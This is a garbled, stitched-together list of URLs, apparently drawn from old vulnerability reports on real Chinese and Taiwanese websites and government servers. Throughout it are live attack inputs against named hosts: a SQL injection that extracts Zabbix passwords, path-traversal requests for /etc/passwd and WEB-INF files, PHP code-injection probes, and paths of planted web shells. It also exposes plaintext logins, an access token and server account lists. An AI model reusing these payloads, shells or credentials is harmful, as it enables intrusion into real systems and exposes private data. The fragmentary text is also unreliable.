webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin http://eda.chaoxing.com/showLogin http://wenku.baidu.com/view/e90e61e86294dd88d0d26be4.html http://admin.eryavideo.com/left.aspx http://www.licaifan.com:80/user/delMessage http://www.wxcyfw.com/ http://www.wxcyfw.com/jeeadmin/jeecms/login.do?returnUrl=/jeeadmin/jeecms/index.do http://202.115.22.138/ http://www.hanqing.ruc.edu.cn/detail.php?class=news&iClassID=9&iInfoID=1854 http://law.ruc.edu.cn/office/login.asp http://www.kingsun.cn/menhu/helpcontent.aspx?classid=1 http://lanmo2008.zol.com.cn/ http://59.64.79.18/list_files.aspx?sectionid=1 http://59.64.79.18/frameContent.aspx?id=341 http://store.tdxinfo.com http://union.novel.sogou.com/ http://union.novel.sogou.com/stat/ajax?oper=grid_sum&d_start=20150421&d_end=20150521&ctype=30&is_settle=&query=&f_cols=&f_cids=&_search=false&nd=1432289822749&rows=20&page=1'&sidx=&sord=asc https://60.247.68.200/prx/000/http/localhost/login http://222.73.41.27、http://www.cqcn.org http://www.huaji.com/member/address/edit/5355 http://www.huaji.com/member/address/edit/520 http://www.huaji.com/member/address/edit/520 http://pdabase.deppon.com:8080/bam/bamCode/index.action http://www.jiukuaidao.com/ 
http://www.jiukuaidao.com/reg/selectCerttificate.htm http://114.112.84.135/info.php http://221.199.203.230:9001/dsoa/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://oa.xinhuamed.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://221.199.203.230:9001/dsoa/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://old.nmgswt.gov.cn/dsoa/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://oa.dream-it.cn/OA/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://180.141.88.102:8081/nnwj/framework/sys/login!login.action?licenseInfo=license http://180.141.88.102:8081/nnwj/adminapp/administra-appro!showApply.action?mutype= http://180.96.63.25/TZJC/WNews_queryColumnWNewsList.action?fNews.columnId=3 http://www.dingdone.com/bbs/config/config_ucenter.php http://www.dingdone.com/bbs/config/config_global.php http://service.dingdone.com/uc_server/admin.php?m=user&a=login&iframe=&sid= http://zabbix.cjdao.cn/ http://gis.lzlj.com/ gc.17173.com/GameDetail http://gc.17173.com/Lessons http://www.dib66.com http://bbs.dib66.com/uc_server/admin.php http://kpi.lzlj.com/Login.aspx http://active.zol.com.cn/08active/lanmo_campus/list.php?city=2 admin.eryavideo.com/left.aspx http://admin.eryavideo.com/Director/ReceiveTask.aspx?type=1&wd=&pagesize=2 www.chaoxing.cc帐号密码。进后台解析漏洞拿到shell https://github.com/easemob/emchat-server-examples http://174.128.237.27/ http://admin.xiazai.xunzai.com/index.php http://mobile.yiban.cn/api/v1/user/search?account=%E8%BF%99%E4%B8%80%E5%88%BB%EF%BC%8Czhang3&access_token=0e7defc6fc2b4af0e49ff98a0774a4a5 http://www.huaji.com/member/study/edit/13238 http://www.huaji.com/member/study/edit/1 urlhttp://www.huaji.com/member/study/del/13238 http://www.huaji.com/member/study/del/1 http://www.huaji.com/member/study http://www.huaji.com/member/study/edit/1 http://www.huaji.com/member/ability/edit/2975 http://www.huaji.com/member/ability/edit/1 url:http://www.huaji.com/member/ability/del/2975 
http://www.huaji.com/member/ability/del/1。访问看看 http://www.huaji.com/member/ability http://www.huaji.com/member/ability/edit/1 http://202.102.41.152:8088/login.jsp http://219.143.15.9/login.jsp http://www.cicc.com.cn/portal/business/am_products_cn.xhtml?productType=1 http://www.cicc.com.cn/portal/jobs/position_list_cn.xhtml?worktype=2 http://61.129.68.194/user/login http://www.wepiao.com/?a=cinemadetailshow&c=cinema&m=web&cinemaid=1004076 http://zb.aimeizhuyi.com:8888 http://zb.aimeizhuyi.com:8888/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 https://61.177.62.254/ https://211.70.1.45/ https://222.139.212.52/ https://222.92.137.74/ https://59.61.234.109/ https://122.227.166.27/ https://123.13.224.247/ https://222.85.76.112/ https://221.176.165.214/ https://122.227.166.26/ https://117.32.249.196/ https://61.175.134.133/ https://218.26.10.175/ https://szico.com/ https://120.194.170.107/ https://118.122.90.136/ https://211.142.165.210/ https://221.12.56.242/ https://218.29.8.41/ https://116.228.51.238/ https://114.80.129.170/ https://117.158.18.199/ https://112.15.171.94 http://zhuanjiaku.ndrc.gov.cn/ http://192.168.200.1/syscmd.asp inurl:sites/MainSite http://www.352.com/ http://115.182.50.72/garb/test.php http://115.182.50.72/garb/testa.php http://115.182.50.72/upload_log.php http://115.182.50.72/upload_minidump.php http://server.51cto.comserver.51cto.com/exp/apc_survey201210/reg.php http://www.landinfo.mlr.gov.cn/ http://219.143.73.19/invokering/JMXInvokerServlet os.51cto.com/os/famousLinux/result2.php http://apps.stnts.com/?s=/abc/abc/abc/${@phpinfo%28%29 http://hotel.stnts.com//?s=/abc/abc/abc/${@phpinfo%28%29 http://jwjg.sasac.gov.cn/login.jsp 
http://ecard.dlmu.edu.cn/ecard/queryStuempNo.xhtml?name=and+1%3D1 http://219.141.242.25/GRETMS_HT/pages/PolicyAuthenticityQry.html http://v.admin5.com/data/uploads/2015/05/22/1992473841555f272660d5d.jpg/1.php http://api.huodongxing.com/v2/user/sendcode http://h.mapgo.cn/Login.htm http://m.wecook.cn/topic/detail/?id=444 http://mail.xy.chinamobile.com/admin/index.php http://ceo.300.cn/index.php/ceo8/score_a ip:222.73.196.45 http://222.73.196.124/index.php/%E4%BA%91%E6%9C%8D%E5%8A%A1:FastDFS http://quick.xiangrikui.com/umsg/loadMessage.do?umsg.id=15959082 http://quick.xiangrikui.com/albumlist/2176617.html http://waiqin.hnhtxx.cn/ http://122.193.9.105:8088/Home/Logon?ReturnUrl=%2f http://122.193.9.70:8085/Content/mobile/GetStbCmList.html http://122.193.9.70:8084/mobilepage/customequery.html?cc=xxxx http://desc.app111.com/beta/php.tar.gz http://xxdl.gw.com.cn/iframe.jsp\?currentPage\=2\&search\=\&subtype\=1\&type\=4 socks5://127.0.0.1:1080 xxdl.gw.com.cn/marketIframe.jsp?currentPage=2&search=&subtype=&type=0%20AND%203*2*1%3d6%20AND%20356%3d356 http://pq.appchina.com/.svn/entries http://rzpt.smesd.gov.cn/ http://rzpt.smesd.gov.cn/artical.jsp?id=a8977ca767154e2db2458af5f3b89c91 http://rzpt.smesd.gov.cn/agencyimg/8ad337822be2492b012be2dc817b0328.jsp http://zhaoht.265g.com/go.php http://zhaoht.265g.com/admincp.php http://tysj.sgcc.com.cn/tsdt/201501/P020150128376347359866.rar http://tysj.sgcc.com.cn/tsdt/201405/P020140528606494137856.zip www.anta.com/Inchon2014/admin/admin_login.php http://yjspy.bjmu.edu.cn/yjsyweb/yb/yuanban_xinwen.asp?x_recid=334 http://gps.kunlian.net:8088/index.jsp,打开辰宇卫星定位监控系统平台,如图所示: http://122.227.209.174 http://203.156.233.234/login http://203.156.233.234/script http://www.yy110.gov.cn http://www.yy110.gov.cn/manager/html http://www.yy110.gov.cn/mana11/shell.jsp http://www.yy110.gov.cn/templet/yyga/wooyun.txt http://t.ufida.com.cn/,发现存在大量的开放接口,对其中的GetVerSionJSON进行测试,发现存在sql注射漏洞。 http://tempuri.org/GetVerSionJSON soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope http://gzycdtb.dayoo.com http://101.251.197.246:8080/Site/ http://uhuibao.com/index.php?s=/ http://home.seentao.com/ http://seentao.yonyou.com/ http://211.160.76.245/ http://cgs.gdfcl.com.cn:9080/MultiOffice/Index.jsp http://211.160.76.245/ http://211.160.76.245/invoker/JMXInvokerServlet,shell www.uhuibao.com http://med.39.net/cds/ywxhzy/Search.aspx?Keywords=12% http://med.39.net/cds/ywxhzy/Search.aspx?Keywords=12% http://ziyuan.iiyi.com/source/search?kw=临床诊疗指南 http://sqlmap.org http://115.182.66.148/info.php http://agent.hongkongairlines.com/info.php http://ffp.hongkongairlines.com/phpinfo.php https://ffp.hongkongairlines.com/info.php http://site.hongkongairlines.com/info.php https://site.hongkongairlines.com/info.php http://open.shopex.cn/ http://open.shopex.cn/docs/api_search/8.htm?docs_keyword=&platform_id=0&method_type_id=22 http://218.206.93.54:9090/login.action http://www.cbs.fudan.edu.cn/attach/application/2015/1000.html http://www.cbs.fudan.edu.cn/attach/application/2015/1100.html http://www.cbs.fudan.edu.cn/attach/application/2015/1200.html http://www.cbs.fudan.edu.cn/attach/application/2015/1300.html http://ad.dopool.com/ad.zip http://www.tclmobile.com.cn/newsite/index.php/search/keysearch http://mp.weixin.qq.com/s?__biz=MjM5MzE3NDI5Mg==&mid=202628426&idx=3&sn=68e11ec7cdf665662a45e6d7f3b5995e&3rd=MzA3MDU4NTYzMw==&scene=6#rd http://web2.cdvcloud.com/e/extend/live/playlist.php?id=1 http://med.39.net/cds/sycd/Search.aspx?Keywords=12% http://med.39.net/cds/sycd/Search.aspx?Keywords=12% http://med.39.net/cds/jbzdjy/Search.aspx?Keywords=12% http://med.39.net/cds/jbzdjy/Search.aspx?Keywords=12% http://med.39.net/cds/ckz/Search.aspx?Keywords=12% http://med.39.net/cds/ckz/Search.aspx?Keywords=12% http://med.39.net/cds/ssk/Search.aspx?Keywords=1% 
http://med.39.net/cds/ssk/Search.aspx?Keywords=1% http://med.39.net/cds/zyjb/Search.aspx?Keywords=BGU010% http://med.39.net/cds/zyjb/Search.aspx?Keywords=BGU010% http://med.39.net/cds/zybz/Search.aspx?Keywords=1% http://med.39.net/cds/zybz/Search.aspx?Keywords=1% http://med.39.net/cds/jbks/Search.aspx?Keywords=1% http://med.39.net/cds/jbks/Search.aspx?Keywords=1% http://med.39.net/cds/jbzd/Default.aspx http://med.39.net/cds/jbzd/Search.aspx?Keywords=1% http://med.39.net/cds/jbzd/Search.aspx?Keywords=1% http://www.stcsm.gov.cn/的redis服务器:211.144.114.53未授权访问,泄露各类信息 http://www.ahhome.com/admin/login.asp http://tiaokuan.iachina.cn:8090/sinopipi/checklogin/checkLoginInfo.do http://211.144.140.91/sinobrps-query/checklogin/checkLoginInfo.do https://github.com/qiueer/MPort/blob/df8079fed58a7dc327e2668f956d1b9cc854465c/lib/base/mail.py http://203.156.233.236/default.aspx http://www.skybility.com/news/newsdetail.php?id=263 http://mpay.hexun.com/ http://mpay.hexun.com/ http://crm.tongbanjie.com/mobilefeedback http://oa.zotye.com/j_acegi_security_check http://car2sharew.daihing.com/user_api/book_try_drive http://61.153.250.106:8083/manager/html http://61.153.250.106:8080/factory_index.action http://61.153.250.108:8082/manager/html http://61.153.250.108:8083/manager/html console:http://61.153.250.106:88//struts/webconsole.html console:http://61.153.250.106:8083//struts/webconsole.html console:http://61.153.250.106:8080//struts/webconsole.html console:http://61.153.250.106:8082//struts/webconsole.html http://119.254.70.72 https://119.254.70.85 http://passport.liba.com/login.htm http://www.imecare.com/ http://w.imecare.com/ http://125.71.200.138:8081/ http://med.39.net/cds/icd9/Default.aspx http://med.39.net/cds/icd9/Search.aspx?Keywords=12 http://med.39.net/cds/icd9/Search.aspx?Keywords=12 http://www.inspur.com/ http://www.whaac.gov.cn:8080/InteractiveCommunication/ProjectList.aspx?sxname= http://www.rcsp.cn/InteractiveCommunication/ProjectList.aspx?sxname= 
http://www.wdaac.cn/wsbsdt/InteractiveCommunication/ProjectList.aspx?sxname= http://60.215.8.148:6006/InteractiveCommunication/ProjectList.aspx?sxname= http://222.135.78.34:8086/InteractiveCommunication/ProjectList.aspx?sxname= http://www.rszwfwzx.gov.cn:8080/wbdt/InteractiveCommunication/ProjectList.aspx?sxname= http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/ProjectList.aspx?sxname= http://member.iachina.cn/phpMyAdmin http://gk.tjnk.gov.cn/showDirInfos.jsp?levelCode=0208 http://zwgk.tjhd.gov.cn:8000/showDirInfos.jsp?levelCode=02 http://zfxxgk.bh.gov.cn/showDirInfos.jsp?levelCode=02 http://xinxigk.baodi.gov.cn/showDirInfos.jsp?levelCode=0208 http://gk.tjhqqzf.gov.cn/showDirInfos.jsp?levelCode=0208 http://bcm.open.com.cn/login.aspx http://sqlmap.org http://wsfw.lnga.gov.cn/ http://123.157.10.19:8080/factory_index.action http://123.157.10.19:8083/manager/html http://www.rhxwl.com/Server.asp http://www.linhaihome.com/ http://jh.zjmy.net/ http://www.lqmyjj.com/ http://www.sxjhjj.com/ http://www.sxkfqjj.com/ http://www.sxpjgtmyjj.com/ http://www.wlmyjj.com/ http://jh.zjmy.net/ http://www.hyqmyjj.com/ http://www.jjmyjj.com/ http://www.yhmyjj.com/ http://www.ttmyjj.com/ http://www.xjmyjj.com/ http://www.lqmyjj.com http://jh.zjmy.net/ http://jh.zjmy.net/admin_manage/system/mg_editwz.asp?lb=save&id=241 http://jh.zjmy.net/admin_manage/system/mg_editwz.asp http://sqlmap.org http://www.wslh.net/index.php?m=content&c=index&a=lists&catid=2 http://v.wyol.com.cn/t/t1/user/bkplay.aspx?uid=4371&bkspid=740&spid=740 http://v.pxitv.com:88/t/t1/user/bkplay.aspx?uid=38&bkspid=28&spid=28 http://v.zghhzx.com.cn/t/t1/user/bkplay.aspx?uid=117&bkspid=43&spid=43 http://v.sygd.tv/t/t1/user/bkplay.aspx?uid=6&bkspid=54&spid=54 http://v.hcvw.cn/t/t1/user/bkplay.aspx?uid=639&spid=7635&bkspid=3842 http://v.zaoqiangtv.com/t/t1/user/bkplay.aspx?spid=791&bkspid=9&uid=109 http://v.zghhzx.net/t/t1/user/bkplay.aspx?uid=59&bkspid=189&spid=189 
http://58.222.151.43/t/t1/user/bkplay.aspx?uid=348&bkspid=356&spid=356 http://v.pudongtv.cn/t/t1/user/bkplay.aspx?uid=1&bkspid=6&spid=6 http://58.210.50.92/t/t1/user/bkplay.aspx?uid=4371&bkspid=1666&spid=1666 http://m.jumei.com/ http://m.staging.jumei.com/ http://m.jumei.com/i/MobileWap/request_delegate?url=../../../../../../../../../../etc/hosts http://m.jumei.com/i/MobileWap/request_delegate?url=../../../../../../../../../../etc/group root:x:0 jumeiops:x:10001 jumeiplat:x:10002 jumeidev:x:10003 jumeidba:x:10004 jumeisec:x:10005 jumeiadmin:x:20000:weibinf,qih1,dongdongf2,mengmengc,hanz,xiw4 jumeiqa:x:10006 zabbix:x:107 nagios:x:108 logs:x:998 http://www.daliyouth.cn/web.zip http://www.bjabia.org/applyExam!apply.do http://duohuo.c.myduohuo.com/global_Cms_contentView_id_399 http://academy.yonyou.com/Px_plan1.aspx?infoid=109 http://academy.yonyou.com/News_1.aspx?newsid=105 http://academy.yonyou.com/open_Courses.aspx?year=2014 http://diy.medlive.cn/?file=diy&action=manage http://www.conjointech.com/server/FCKeditor/editor/filemanager/connectors/test.html http://www.mdjxsb.com/server/FCKeditor/editor/filemanager/connectors/test.html# http://www.mefosun.com/server/FCKeditor/editor/filemanager/connectors/test.html# http://www.chhwujin.com/server/FCKeditor/editor/filemanager/connectors/test.html http://pinggu.lltqc.com/server/FCKeditor/editor/filemanager/connectors/test.html http://www.zhihongcn.com/server/FCKeditor/editor/filemanager/connectors/test.html http://www.fastin.com.cn/server/FCKeditor/editor/filemanager/connectors/test.html http://www.duohuo.net/global_index_search?keywords= http://yidasiyin.com/Easy/Login.aspx http://wr-sz.cn/Easy/Login.aspx http://gxbdsp.com/Easy/Login.aspx http://cyou0755.com/Easy/Login.aspx http://521gx.com/Easy/Login.aspx http://leaders56.com/Easy/Login.aspx www.duohuo.net/global_cms_loadmore http://wenku.baidu.com/link?url=3K55ezvNFBlgLGFAX_4lAmUYcEOUXNqdkweC2KviJnxGNMp8YcrnKufr2_3XJ64NHSPQOfwxF8WBr0LzRqMhIjkgoDxHc0Yzqtx3DFOpBN_ 
http://i.zhaopin.com/usermaster/UsermasterManage/ChangeEmail?jsoncallback=你好&email=601333824@qq.com http://wx-test.chuchujie.com/index.ph http://dev-0504.wx-dev.chuchujie.com/ http://admin.xjcxedu.com/index.php?app=User&mod=Teacher&act=index&id=1&rand=Math.random%28%29 http://admin.xjcxedu.com/index.php?app=Resource&mod=ResSubject&act=index&selection=zh-CN&source=UGC&p=6150 http://admin.xjcxedu.com/index.php?app=User&mod=Teacher&act=add&node=1 http://stied.whut.edu.cn/getNews.action http://course.sitsh.edu.cn/sx2/loginAction!login.action http://course.sitsh.edu.cn/sx2/one.jsp http://course.sitsh.edu.cn/sx2/cmd.jsp http://itrc.jju.edu.cn/situation_policy/ http://www.wooyun.org/bugs/wooyun-2015-0112177/trace/41eccdef4dbf2da148a875c5af9dfb67 http://222.247.53.197//8001hn_oa/ http://www.muu.com.cn/hd/20131225/christmas_2013_2.html?key=1 www.muu.com.cn www.muu.com.cn www.muu.com.cn http://www.yoncc.com/index.php?c=Index&a=detail&catid=17&id=50 www.yoncc.com www.zjuol.com http://data.ylepb.gov.cn/Upload/ http://wx.chuchujie.com/admin.php http://www.whcits.com/qz2.aspx?id=%B7%A8%B9%FA http://weixin.sunits.com/wx/login!login.do http://caketime.com.cn/Product/Details.aspx?ID=10937&CategoryId=10076%27 http://caketime.com.cn/Product/Details.aspx?ID=10937&CategoryId=10076%27 http://sqlmap.org http://wooyun.org/bugs/wooyun-2015-0114708 http://panpom.com/index.php?action=pro_list_product&cat=19&cid=8&controller=site http://cang.fday.xyz/ http://dingdan.fday.co/ www.ctgpc.com.cn http://www.ctgpc.com.cn/sbgs_new/admin/index.php http://email.ctgpc.com.cn/ http://wooyun.org/bugs/wooyun-2010-092781 https://sa.ctgpc.com.cn/ http://edm.wowsai.com/ url:http://www.hnmgjr.com/wx/gameLogin data:code=137231&money=2700.0&key=【账号】&pwd=【密码】 http://210.76.203.35/status?full=true http://210.76.203.35/invoker/JMXInvokerServlet部署war,getsell http://ppt.edri.sinopec.com/CN/volumn/current.shtml 
http://ppt.edri.sinopec.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://www.job18.net/ http://211.143.251.235:83//Lesktop/Management/DeptEdit.aspx?did=1 http://www.yzjy.net:8864/Lesktop/Management/DeptEdit.aspx?did=1 http://oa.sxtwedu.com/Lesktop/Management/DeptEdit.aspx?did=1 http://oa.xsbhjt.com/Lesktop/Management/DeptEdit.aspx?did=1 http://www.xsbhjt.com//Lesktop/Management/DeptEdit.aspx?did=1 http://www.syjyxy.com:8000//Lesktop/Management/DeptEdit.aspx?did=1 http://dp.job18.net/Lesktop/Management/DeptEdit.aspx?did=1 http://oa.guanghuiqiche.com//Lesktop/Management/DeptEdit.aspx?did=1 http://oa.kllssws.com//Lesktop/Management/DeptEdit.aspx?did=1 http://comoa.umeise.com//Lesktop/Management/DeptEdit.aspx?did=1 http://oasxxkjj03.idc.chujiusoft.net/Lesktop/Management/DeptEdit.aspx?did=1 http://8.86739.com/Lesktop/Management/DeptEdit.aspx?did=1 http://125.65.165.161:86/Lesktop/Management/DeptEdit.aspx?did=1 http://lazyoa.gxahi.com/Lesktop/Management/DeptEdit.aspx?did=1 http://coa.lyta.com.cn/Lesktop/Management/DeptEdit.aspx?did=1 http://jjs.cjlu.edu.cn/ http://jjs.cjlu.edu.cn/Show_detail.php?I=1693 http://m.300.cn/Maps.do?corPname=&method=showFilter http://cwcx.sdju.edu.cn/ http://www.tmtpost.com/.svn/entries http://jx.3wcoffee.com/wp-login.php http://s45.ys.g.baofeng.com/.svn/entries http://www.muzhiwan.com/.svn/entries http://221.199.203.230:9001/dsoa/Personnel/Infomation.aspx?userid=1 http://old.nmgswt.gov.cn/dsoa/Personnel/Infomation.aspx?userid=1 http://xinhuachongming.com.cn/DSOA_TY/Personnel/Infomation.aspx?userid=1 http://oa.xinhuamed.com.cn/DSOA_TY/Personnel/Infomation.aspx?userid=1 http://oa.dream-it.cn/OA/Personnel/Infomation.aspx?userid=1 http://baoxian.gome.com.cn/car/order/view_pa?orderId=1000007704 http://**.**.**/en/login.html http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/_ http://**.**.**/ http://**.**.**/log/cacti.log 
http://**.**.**/manager/ http://jxhd.ciwong.com/ http://117.79.131.140:8000/zh-CN/app/launcher/home http://house.mama.cn/index.php http://61.243.113.13/ http://61.243.113.13/common/userLogin.action http://61.243.113.13/css1.jsp http://221.199.9.205/e/index.jsp http://f.lashou.com/spLogin.php http://wooyun.org/bugs/wooyun-2010-0115492 http://www.nycgs.cn:80/BdMapServlet http://ytncrm.yili.com/find_password_tj.asp http://123.232.119.122:81/DefaultPage1.aspx http://pre-forum.grandcloud.cn/盛大云论坛 http://web.grandcloud.cn/盛大网站云phpv9 http://221.4.168.88/user!index ems.taikang.com/web.tar.gz qryapwd:commonswitch c4:6a:b7:**:**:** c8:97:4c:f7:** c8:97:4c:f7:** c8:97:4c:f7:** c8:97:4c:f7:**CMCC http://upload.baomihua.com//videoupload3.aspx?groupid=1 http://upload.baomihua.com/union_videoupload1.aspx http://www.szdsyy.com/ http://www.pg.com.cn/竟然也在这个服务器上!当时只是传了个一句话上去,看到乌云上关于宝洁的漏洞都忽略了,就暂时没有提交,害怕提交了也被忽略,这就影响大了。 http://www.szcea.org.cn/ http://www.szcea.org.cn/news/detail.asp?id=8362 www.mama.cn/photo/index.php?a=Search&d=index&g=Search&gotosearch=yes&keyword=&num=52&page=3&searchtype=photo http://weixin.mama.cn/session/login http://www.newvane.com.cn/ http://www.wis18.com/ http://www.newvane.com.cn/index.php?ac=article&at=read&did=351 http://edu.cmbc.com.cn/wis18/file.showimage.flow?filename=../WEB-INF/web.xml http://edu.cmbc.com.cn/wis18/file.showimage.flow?filename=../WEB-INF/lib/wis18.jar jdbc:sqlserver://192.168.100.2:1433;databasename=onlineexam http://bqvote.ynet.com/dovote.php?phonenum=*&uname=bjjavmgp http://bqfood.ynet.com/ http://www.good321.net/index.do http://14.17.121.39:81 http://14.17.121.39:81 http://101.227.255.8/ http://211.140.218.166/WebResource.axd?d=1432176493 http://211.140.218.166/ScriptResource.axd http://hhrsks.com/htdocs.rar https://secure.damai.cn/ http://secure1.damai.cn/ http://admin.ucsp.xbeizi.com/login http://www.uqee.com/public/login http://www.wecook.cn/.git/config http://cai.wecook.cn/.git/config http://u1.wecook.cn/.git/config 
http://223.223.181.117 http://113.98.240.231/ http://www.infojiading.cn/ http://jy.shutcm.edu.cn/index.asp http://jiuye.lixin.edu.cn/index.asp http://job.shmtu.edu.cn/index.asp http://jiuye.sbs.edu.cn/index.asp http://job.shupl.edu.cn/index.asp http://jy.sthu.edu.cn/index.asp http://job.shjgu.edu.cn/index.asp http://jytd.lidapoly.edu.cn/job/index.asp http://job.sicfl.edu.cn/ http://job.smic.edu.cn/index.asp http://www.infojiading.cn/sppcweb/index.asp http://hd.mama.cn/gz/calendar/log/?month=5&year=2015-0 user:tangyanfei pass:tyf123456 user:xuya pass:123456a http://hd.mama.cn/admin/activity/checklist/?check=u http://**.**.**/nms/login.action http://user.kdnet.net/register_reset_password.asp www.fotomore.com/news/detail.php?aid=703 http://jiehun.55bbs.com/ http://dealer.55bbs.com/ http://i.boqii.com http://www.jianjie.cc/Account/FlightOrderDetail.aspx?orderop=HYQ2DSC83VZJRXEGCL85XEZ93U76GPGL7Y8HJLXMS2N4926N4WGEY3BMF7VFQQ47WT6CM7J4VCCUE http://his.tv.sohu.com/his/get.do?&c=1&callback=%3Cscript%3E&passport=&encode=UTF-8&pagesize=20&page=1&videotype=2&htype=1&uid=257764876&_=1432546951082 http://zb.zotye.com:8083/user_index.do http://www.1mutian.com:80/ www.1mutian.com http://221.199.203.230:9001/dsoa/modules/pdflist.aspx?info_id=1 http://old.nmgswt.gov.cn/dsoa/modules/pdflist.aspx?info_id=1 http://xinhuachongming.com.cn/DSOA_TY/modules/pdflist.aspx?info_id=1 http://oa.xinhuamed.com.cn/DSOA_TY/modules/pdflist.aspx?info_id=1 http://oa.dream-it.cn/OA/modules/pdflist.aspx?info_id=1 http://wap.renrentou.com/friendgodeuser/success?dns=534230 http://wap.renrentou.com/friendgodeuser/success?dns=534229 www.10655123.com http://admin.10655123.com/ http://admin.10655123.com/common/left.jsp http://www.10655123.com/images/.svn/entries http://admin.10655123.com/client/.svn/entries http://admin.10655123.com/mngr/privilege/getPrivilegeListByGroupId.action?operGroupLevel=0 http://admin.10655123.com/mngr/user/deleteUser.jsp 
http://my.shushi100.com/popajax/changecity.aspx?action=xiamen|%CF%C3%C3%C5&r=0.9740669283330295 http://my.shushi100.com/ashx/changecity.ashx?cityename=xiamen&r=0.5061514708509435&callback=jsonp1432482839856&_=1432482889068 http://dj.17m3.com/game.aspx?sercon=* http://dj.17m3.com/game.aspx?sercon=% edm.mail.m3guocdn.com/bbb.aspx http://61.50.251.130:80/manager/html http://112.125.92.1:27017/ http://124.238.218.78/ http://124.238.218.78 http://111.26.194.37:80/manager/html http://www.jlsysp.org.cn/ShenPing/view.do?method=zhu http://111.26.194.37/BuLiang/users.do;jsessionid=917D738EAEBEF1992D8A27D1565084DE?method=login http://111.26.194.37/QiXie/view.do?method=zhu http://www.hecard.com.cn/manager/html url:http://124.128.69.182:80/manager/html user:admin pass:admin http://bbs.web.teeqee.com/config.inc.php~ http://aqe.wyn88.com/Quickas/login http://58.18.172.19:8686/index.php?retid=99925562c93262a8b&unautologin=1 cn:9060/ https://www.juxinli.com/down_load?args=../../../../../../../../../../etc/passwd http://miao.stnts.com/sec/Cafe/ApplyList http://59.56.62.170:81/ http://59.56.62.170:81/login.aspx存在注入漏洞,脱掉你们的裤子,呵呵 http://x.dwb.so//query.php?n= http://www.juooo.com/myjuooo/address/?address_id=XXXXXX http://www.juooo.com/myjuooo/write http://www.juooo.com/myjuooo/note http://www.juooo.com/myjuooo/note http://www.juooo.com/myjuooo/view/370000/ http://oa.lefucn.com http://plc.fa.omron.com.cn/log/show.action?ip=&oper=&dateFrom=&dateTo= http://219.159.69.133:81/ME/LOGIN.ASPX http://219.159.69.133//admin/login.aspx http://eng.okmart.com.tw/ENG_WebSite/SHARE/NOTICE_BOARD.aspx?NOTICE_NO=201404014 https://ecp.fareastone.com.tw/ECP/customer/custAccountApply_Frame.action www.yizijia.cn http://**.**.**/UploadPhoto/5eace63a-60ee-41c1-ab45-e918e24b7699.php http://www.lefucn.com/index.php?r=home/public/Webaffiche&id=13 http://employee.okmart.com.tw/okweb/bulletin4/bulletin4_edit.asp?BulNO=77588&Source=Y http://rkjj.ahpfpc.gov.cn/UpLoadFile/ASPXSpy.txt 
http://rkjj.ahpfpc.gov.cn/UpLoadFile/xx.aspx http://www.ahnjsw.gov.cn/uploadfile/xx.aspx http://ldrk.ahpfpc.gov.cn/uploadfile/xx.aspx http://rkjj.ahpfpc.gov.cn/UpLoadFile/xx.aspx http://jlfz.ahpfpc.gov.cn/UpLoadFile/xx.aspx http://www.fdxjsw.gov.cn/uploadfile/xx.aspx http://www.czsjsw.gov.cn/uploadfile/xx.aspx http://www.tljsw.gov.cn/uploadfile/xx.aspx http://www.tljsw.gov.cn/uploadfile/xx.aspx http://113.240.245.42:8081/A430121chss/chss.html http://union.lashou.com http://union.lashou.com/index.php?r=tui/tui/goods http://survey.kmu.edu.tw/QS00/alulmniIndex.action http://123.127.94.135:81/rtyh3/login.jsp http://www.jxvw.com/ http://xgxb.shuzibao.com/xgxb/manage/dbbak.asp http://szb.shmg.org.cn/manage/dbbak.asp http://www.sxgjdl.com:8181//manage/dbbak.asp http://www.zfc.edu.cn/dzb/manage/dbbak.asp http://xiaobao.gdqy.edu.cn/manage/dbbak.asp http://www.cnmo.com/docVote.php http://114.251.7.140:85/rtyhmap/login.jsp http://114.251.7.140:85/rtyhmap/pda/pic/%7B20150526-0804-0832-0000-7641C1A66CB8%7D.jsp http://114.251.7.140:85/rtyhmap/pda/pic/%7B20150526-0826-5867-0001-ACB33EC72DD5%7D.jsp http://nsp.lashou.com/ GoogleHack:inurl:/Content/PlatContentNew http://cloud.ncedu.gov.cn http://www.361school.com http://202.103.215.61 http://61.190.174.10:8002 http://xyygsy.com.cn http://fx.ssdfx.sd.cn http://***/PlatFormN/PlatformResouseN/SearchOuterIndexList.aspx?a=b http://***/PlatFormN/PlatformResouseN/SearchOuterIndexList.aspx?a=b 